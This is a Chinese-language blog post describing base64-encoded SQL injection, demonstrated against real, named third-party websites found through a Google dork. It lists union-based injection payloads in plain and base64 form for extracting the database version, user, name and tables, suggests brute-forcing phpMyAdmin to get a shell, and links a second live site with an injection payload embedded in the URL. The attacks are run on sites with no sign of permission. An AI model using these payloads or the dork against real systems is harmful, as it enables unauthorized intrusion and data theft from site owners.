base64变形注入

  1. 前言
  2. 正文

前言

逛RSS的时候发现一个叫base64注入的文章,后面上google查了一下,就是在base64编码的情况下会造成注入,思路还是一样的
FkeA5q.jpg

正文

上google搜:inurl:.php?id=MTM intext:公司就可以找到很多注入点
这里拿其中一个来做例子:

测试链接:斗湖中华商会
判断是否存在注入:

13 and 1=2 | MTMgYW5kIDE9Mg==

FkeBdA.png

获取位数(得到11位)

13 order by 11 | MTMgb3JkZXIgYnkgMTI=

Fke2QS.md.png

获取显位

0 union select 1,2,3,4,5,6,7,8,9,10,11 | MCB1bmlvbiBzZWxlY3QgMSwyLDMsNCw1LDYsNyw4LDksMTAsMTE=

FkeWLQ.md.png

获取数据库用户名,数据库版本,数据库名

0 union select 1,2,version(),database(),5,6,7,8,9,user(),11|MCB1bmlvbiBzZWxlY3QgMSwyLHZlcnNpb24oKSxkYXRhYmFzZSgpLDUsNiw3LDgsOSx1c2VyKCksMTE=

FkeTJ0.png

获取表名,然而好像出现了什么问题..

0 union select 1,2,table_name,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=0x43434354415741555F4F52474442|MCB1bmlvbiBzZWxlY3QgMSwyLHRhYmxlX25hbWUsNCw1LDYsNyw4LDksMTAsMTEgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0weDQzNDM0MzU0NDE1NzQxNTU1RjRGNTI0NzQ0NDI=

FkmSF1.png

找了一下问题好像是因为上面编码问题…然后想了一下也搞不了,就到此结束吧….
这个站有phpmyadmin,应该可以爆破一波然后通过phpmyadmin进行getshell,当然如果能爆出路径直接getshell就好

这里在提供一个站,没什么东西就个id表..:[�������ӻ���](http://yyyhhg.com/newsDetail.php?id=MCB1bmlvbiBzZWxlY3QgMSx1c2VyKCksMyw0LDUsNiw3)

http://yyyhhg.com/newsDetail.php?id=MCB1bmlvbiBzZWxlY3QgMSx1c2VyKCksMyw0LDUsNiw3
转载请声明:转自422926799.github.io


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:base64变形注入

本文作者:九世

发布时间:2018-11-25, 09:18:57

最后更新:2019-04-19, 20:36:16

原始链接:http://jiushill.github.io/posts/3975ae51.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录